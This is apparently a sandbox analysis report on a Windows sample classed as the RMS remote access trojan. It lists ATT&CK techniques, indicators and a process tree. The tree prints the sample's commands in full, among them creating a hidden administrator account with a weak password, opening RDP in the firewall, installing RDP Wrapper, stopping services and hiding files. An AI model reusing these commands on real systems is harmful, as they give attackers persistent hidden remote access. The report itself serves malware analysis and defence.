rms | 7bdba11575e35a256352e15ea53f5b17d9ba3713511ea7404c6f9a85313d4f32

Analysis

max time kernel
147s
max time network
147s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
27-11-2024 14:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a84fbfcea2b58022e607879037439034_JaffaCakes118.exe
Size

6.8MB
MD5

a84fbfcea2b58022e607879037439034
SHA1

0206c493ddd26d98da41b2275f58650ccd51b2a3
SHA256

7bdba11575e35a256352e15ea53f5b17d9ba3713511ea7404c6f9a85313d4f32
SHA512

095086ae0b2b0157d7af8d34a3345484c934e7d1c5e14d7a98a823d7e3ff1e355418282e15f86406ca43fb51a632be438b6c0b87dfbb90301a6ab79c8c8a9ea4
SSDEEP

196608:FK5Kz2OOHyL6NfhPLfxyN27aTD/XTiNvaVLQuqxF4:GKz2OIq6xfa3/XTiNieF4

Score

10^/10

rms defense_evasion discovery evasion execution persistence privilege_escalation rat trojan

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Rms family
rms

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exe

pid	Process
2188	netsh.exe
1848	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

Processes:

RDPWInst.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exe

pid	Process
1600	attrib.exe
812	attrib.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 20 IoCs

Processes:

WinDevInstall.exestart1.exestart.exeBuilder.exeBuilder2.exeWinUpdate.exeRDP.exeRDPWrapper_run.exeRDPWrapper.exeWinUpdate1.exerun.exeCDevice.exeCDevice.exeRDPWInst.exeCDevice.exeCDevice.exesysdevices.exesysdevices.exesysdevices.exeRDPWInst.exe

pid	Process
2848	WinDevInstall.exe
536	start1.exe
2420	start.exe
1692	Builder.exe
2104	Builder2.exe
2968	WinUpdate.exe
1956	RDP.exe
1744	RDPWrapper_run.exe
2300	RDPWrapper.exe
768	WinUpdate1.exe
2492	run.exe
2392	CDevice.exe
1532	CDevice.exe
2832	RDPWInst.exe
2760	CDevice.exe
2640	CDevice.exe
2180	sysdevices.exe
3068	sysdevices.exe
1100	sysdevices.exe
2076	RDPWInst.exe

Loads dropped DLL 32 IoCs

Processes:

a84fbfcea2b58022e607879037439034_JaffaCakes118.exeWinDevInstall.exestart1.exestart.exeRDP.exeRDPWrapper_run.exeWinUpdate.exeWinUpdate1.exeRDPWrapper.exerun.execmd.execmd.exeCDevice.exe

pid	Process
2372	a84fbfcea2b58022e607879037439034_JaffaCakes118.exe
2848	WinDevInstall.exe
2848	WinDevInstall.exe
2848	WinDevInstall.exe
536	start1.exe
536	start1.exe
2420	start.exe
2420	start.exe
2420	start.exe
2420	start.exe
2420	start.exe
2420	start.exe
2420	start.exe
1956	RDP.exe
1744	RDPWrapper_run.exe
1744	RDPWrapper_run.exe
2968	WinUpdate.exe
2968	WinUpdate.exe
2968	WinUpdate.exe
768	WinUpdate1.exe
2300	RDPWrapper.exe
2300	RDPWrapper.exe
2300	RDPWrapper.exe
2492	run.exe
2176	cmd.exe
2176	cmd.exe
1632	cmd.exe
2176	cmd.exe
2640	CDevice.exe
2640	CDevice.exe
2996
1632	cmd.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

Processes:

flow	ioc
5	raw.githubusercontent.com
18	raw.githubusercontent.com
19	raw.githubusercontent.com
4	raw.githubusercontent.com

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

RDPWInst.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

Hide Artifacts: Hidden Users 1 TTPs 1 IoCs

defense_evasion

Hidden Users

T1564.002

Processes:

reg.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\root = "0"	reg.exe

Drops file in Program Files directory 2 IoCs

Processes:

RDPWInst.exe

description	ioc	Process
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
684	sc.exe
1472	sc.exe
2168	sc.exe
880	sc.exe
1812	sc.exe
3012	sc.exe
2072	sc.exe
1628	sc.exe
1876	sc.exe
1480	sc.exe
1712	sc.exe
1496	sc.exe
1036	sc.exe
1548	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exe

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 54 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

sc.exeCDevice.exeRDPWrapper_run.exesc.exesc.exeBuilder.exereg.exereg.exenet.exeCDevice.exereg.exesysdevices.exeRDP.exesc.exenet.exesc.exeWinDevInstall.exeBuilder2.exeWinUpdate.execmd.exeregedit.exesc.exeattrib.exeCDevice.exeCDevice.exeRDPWInst.exestart.exesc.exesysdevices.exea84fbfcea2b58022e607879037439034_JaffaCakes118.exeRDPWrapper.exesc.exesc.exeWinUpdate1.exesc.exesysdevices.exenetsh.exereg.exenet.exerun.exenet1.exenet1.exesc.exesc.exetaskkill.exenet1.exeregedit.exestart1.exesc.execmd.exetaskkill.exeattrib.exesc.exeRDPWInst.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CDevice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWrapper_run.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Builder.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CDevice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysdevices.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDP.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinDevInstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Builder2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CDevice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CDevice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	start.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysdevices.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a84fbfcea2b58022e607879037439034_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWrapper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinUpdate1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysdevices.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	run.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	start1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe

Kills process with taskkill 2 IoCs

evasion

Processes:

taskkill.exetaskkill.exe

pid	Process
1980	taskkill.exe
2536	taskkill.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid	Process
1652	regedit.exe
2740	regedit.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

CDevice.exeCDevice.exeCDevice.exeCDevice.exesysdevices.exe

pid	Process
2392	CDevice.exe
2392	CDevice.exe
2392	CDevice.exe
2392	CDevice.exe
1532	CDevice.exe
1532	CDevice.exe
2760	CDevice.exe
2760	CDevice.exe
2640	CDevice.exe
2640	CDevice.exe
2640	CDevice.exe
2640	CDevice.exe
2180	sysdevices.exe

Suspicious behavior: LoadsDriver 5 IoCs

Processes:

pid	Process
2996
2996
2996
2996
2996

Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

sysdevices.exe

pid	Process
1100	sysdevices.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

taskkill.exetaskkill.exeCDevice.exeCDevice.exeCDevice.exeRDPWInst.exe

description	pid	Process
Token: SeDebugPrivilege	1980	taskkill.exe
Token: SeDebugPrivilege	2536	taskkill.exe
Token: SeDebugPrivilege	2392	CDevice.exe
Token: SeDebugPrivilege	2760	CDevice.exe
Token: SeTakeOwnershipPrivilege	2640	CDevice.exe
Token: SeTcbPrivilege	2640	CDevice.exe
Token: SeTcbPrivilege	2640	CDevice.exe
Token: SeDebugPrivilege	2832	RDPWInst.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

CDevice.exeCDevice.exeCDevice.exeCDevice.exe

pid	Process
2392	CDevice.exe
1532	CDevice.exe
2760	CDevice.exe
2640	CDevice.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a84fbfcea2b58022e607879037439034_JaffaCakes118.exeWinDevInstall.exestart1.exestart.exeRDP.exeRDPWrapper_run.exeWinUpdate.exe

description	pid	Process	procid_target
PID 2372 wrote to memory of 2848	2372	a84fbfcea2b58022e607879037439034_JaffaCakes118.exe	30
PID 2372 wrote to memory of 2848	2372	a84fbfcea2b58022e607879037439034_JaffaCakes118.exe	30
PID 2372 wrote to memory of 2848	2372	a84fbfcea2b58022e607879037439034_JaffaCakes118.exe	30
PID 2372 wrote to memory of 2848	2372	a84fbfcea2b58022e607879037439034_JaffaCakes118.exe	30
PID 2372 wrote to memory of 2848	2372	a84fbfcea2b58022e607879037439034_JaffaCakes118.exe	30
PID 2372 wrote to memory of 2848	2372	a84fbfcea2b58022e607879037439034_JaffaCakes118.exe	30
PID 2372 wrote to memory of 2848	2372	a84fbfcea2b58022e607879037439034_JaffaCakes118.exe	30
PID 2848 wrote to memory of 536	2848	WinDevInstall.exe	32
PID 2848 wrote to memory of 536	2848	WinDevInstall.exe	32
PID 2848 wrote to memory of 536	2848	WinDevInstall.exe	32
PID 2848 wrote to memory of 536	2848	WinDevInstall.exe	32
PID 2848 wrote to memory of 536	2848	WinDevInstall.exe	32
PID 2848 wrote to memory of 536	2848	WinDevInstall.exe	32
PID 2848 wrote to memory of 536	2848	WinDevInstall.exe	32
PID 536 wrote to memory of 2420	536	start1.exe	33
PID 536 wrote to memory of 2420	536	start1.exe	33
PID 536 wrote to memory of 2420	536	start1.exe	33
PID 536 wrote to memory of 2420	536	start1.exe	33
PID 536 wrote to memory of 2420	536	start1.exe	33
PID 536 wrote to memory of 2420	536	start1.exe	33
PID 536 wrote to memory of 2420	536	start1.exe	33
PID 2420 wrote to memory of 1692	2420	start.exe	34
PID 2420 wrote to memory of 1692	2420	start.exe	34
PID 2420 wrote to memory of 1692	2420	start.exe	34
PID 2420 wrote to memory of 1692	2420	start.exe	34
PID 2420 wrote to memory of 1692	2420	start.exe	34
PID 2420 wrote to memory of 1692	2420	start.exe	34
PID 2420 wrote to memory of 1692	2420	start.exe	34
PID 2420 wrote to memory of 2104	2420	start.exe	35
PID 2420 wrote to memory of 2104	2420	start.exe	35
PID 2420 wrote to memory of 2104	2420	start.exe	35
PID 2420 wrote to memory of 2104	2420	start.exe	35
PID 2420 wrote to memory of 2104	2420	start.exe	35
PID 2420 wrote to memory of 2104	2420	start.exe	35
PID 2420 wrote to memory of 2104	2420	start.exe	35
PID 2420 wrote to memory of 2968	2420	start.exe	36
PID 2420 wrote to memory of 2968	2420	start.exe	36
PID 2420 wrote to memory of 2968	2420	start.exe	36
PID 2420 wrote to memory of 2968	2420	start.exe	36
PID 2420 wrote to memory of 2968	2420	start.exe	36
PID 2420 wrote to memory of 2968	2420	start.exe	36
PID 2420 wrote to memory of 2968	2420	start.exe	36
PID 2420 wrote to memory of 1956	2420	start.exe	37
PID 2420 wrote to memory of 1956	2420	start.exe	37
PID 2420 wrote to memory of 1956	2420	start.exe	37
PID 2420 wrote to memory of 1956	2420	start.exe	37
PID 2420 wrote to memory of 1956	2420	start.exe	37
PID 2420 wrote to memory of 1956	2420	start.exe	37
PID 2420 wrote to memory of 1956	2420	start.exe	37
PID 1956 wrote to memory of 1744	1956	RDP.exe	38
PID 1956 wrote to memory of 1744	1956	RDP.exe	38
PID 1956 wrote to memory of 1744	1956	RDP.exe	38
PID 1956 wrote to memory of 1744	1956	RDP.exe	38
PID 1956 wrote to memory of 1744	1956	RDP.exe	38
PID 1956 wrote to memory of 1744	1956	RDP.exe	38
PID 1956 wrote to memory of 1744	1956	RDP.exe	38
PID 1744 wrote to memory of 2300	1744	RDPWrapper_run.exe	39
PID 1744 wrote to memory of 2300	1744	RDPWrapper_run.exe	39
PID 1744 wrote to memory of 2300	1744	RDPWrapper_run.exe	39
PID 1744 wrote to memory of 2300	1744	RDPWrapper_run.exe	39
PID 1744 wrote to memory of 2300	1744	RDPWrapper_run.exe	39
PID 1744 wrote to memory of 2300	1744	RDPWrapper_run.exe	39
PID 1744 wrote to memory of 2300	1744	RDPWrapper_run.exe	39
PID 2968 wrote to memory of 768	2968	WinUpdate.exe	40

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exe

pid	Process
1600	attrib.exe
812	attrib.exe

C:\Users\Admin\AppData\Local\Temp\a84fbfcea2b58022e607879037439034_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\a84fbfcea2b58022e607879037439034_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2372
- C:\ProgramData\CardWindows\WinDevInstall.exe
  "C:\ProgramData\CardWindows\WinDevInstall.exe" -p7832489354378589235643543456
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2848
- - C:\ProgramData\CardWindows\start1.exe
    "C:\ProgramData\CardWindows\start1.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:536
  - - C:\ProgramData\CardWindows\start.exe
      "C:\ProgramData\CardWindows\start.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2420
    - - C:\ProgramData\CardWindows\Builder.exe
        
        "C:\ProgramData\CardWindows\Builder.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1692
    - - C:\ProgramData\CardWindows\Builder2.exe
        
        "C:\ProgramData\CardWindows\Builder2.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2104
    - - C:\ProgramData\CardWindows\WinUpdate.exe
        
        "C:\ProgramData\CardWindows\WinUpdate.exe" -p5387687645378674524512345389721228
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2968
      - C:\ProgramData\CardWindows\WinUpdate1.exe
        
        "C:\ProgramData\CardWindows\WinUpdate1.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:768
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\ProgramData\CardWindows\SysInstall.bat" "
        7⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2176
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\ProgramData\CardWindows"
        8⤵
        Sets file to hidden
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:1600
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop RManService
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2168
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop VDeviceCard
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1480
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop NPackStereo
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2072
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop ServiceWork
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1472
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop IntelDriver
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1812
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop AMIHardware
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1712
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete RManService
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1496
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete VDeviceCard
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:684
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete NPackStereo
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1548
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete ServiceWork
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1036
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete IntelDriver
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1628
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete AMIHardware
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1876
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im rfusclient.exe /f
        8⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1980
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im rutserv.exe /f
        8⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2536
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\SYSTEM\Nvidia\Toolbar\DeviceCard" /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3004
        
        C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "C:\ProgramData\CardWindows\config_set.reg"
        8⤵
        System Location Discovery: System Language Discovery
        Runs .reg file with regedit
        
        PID:1652
        
        C:\ProgramData\CardWindows\CDevice.exe
        
        "C:\ProgramData\CardWindows\CDevice.exe" /silentinstall
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2392
        
        C:\ProgramData\CardWindows\CDevice.exe
        
        "C:\ProgramData\CardWindows\CDevice.exe" /firewall
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1532
        
        C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "C:\ProgramData\CardWindows\config_set.reg"
        8⤵
        System Location Discovery: System Language Discovery
        Runs .reg file with regedit
        
        PID:2740
        
        C:\Windows\SysWOW64\sc.exe
        
        sc failure VDeviceCard reset= 0 actions= restart/500/restart/500/restart/500
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3012
        
        C:\Windows\SysWOW64\sc.exe
        
        sc config VDeviceCard obj= LocalSystem type= interact type= own
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:880
        
        C:\ProgramData\CardWindows\CDevice.exe
        
        "C:\ProgramData\CardWindows\CDevice.exe" /start
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2760
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\ProgramData\CardWindows\*.*"
        8⤵
        Sets file to hidden
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:812
    - - C:\ProgramData\CardWindows\RDP.exe
        
        "C:\ProgramData\CardWindows\RDP.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1956
      - C:\ProgramData\RDP\RDPWrapper_run.exe
        
        "C:\ProgramData\RDP\RDPWrapper_run.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1744
        
        C:\ProgramData\RDP\RDPWrapper.exe
        
        "C:\ProgramData\RDP\RDPWrapper.exe" -p27852786784527827414245258638727424524124452741245527212
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2300
        
        C:\ProgramData\RDP\run.exe
        
        "C:\ProgramData\RDP\run.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2492
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\ProgramData\RDP\run.bat" "
        9⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1632
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:2476
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:2076
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:2188
        
        C:\Windows\SysWOW64\net.exe
        
        net user root /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:2332
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user root /add
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:2520
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup Çñ¼¿¡¿ßΓαáΓ«αδ root /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:288
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Çñ¼¿¡¿ßΓαáΓ«αδ root /add
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:3048
        
        C:\Windows\SysWOW64\net.exe
        
        net user root 12345
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:2692
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user root 12345
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:1708
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v root /t REG_DWORD /d 0 /f
        10⤵
        Hide Artifacts: Hidden Users
        System Location Discovery: System Language Discovery
        
        PID:2908
        
        C:\ProgramData\RDP\RDPWInst.exe
        
        "C:\ProgramData\RDP\RDPWInst.exe" -i -o
        10⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2832
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        11⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1848
        
        C:\ProgramData\RDP\RDPWInst.exe
        
        "C:\ProgramData\RDP\RDPWInst.exe" -w
        10⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
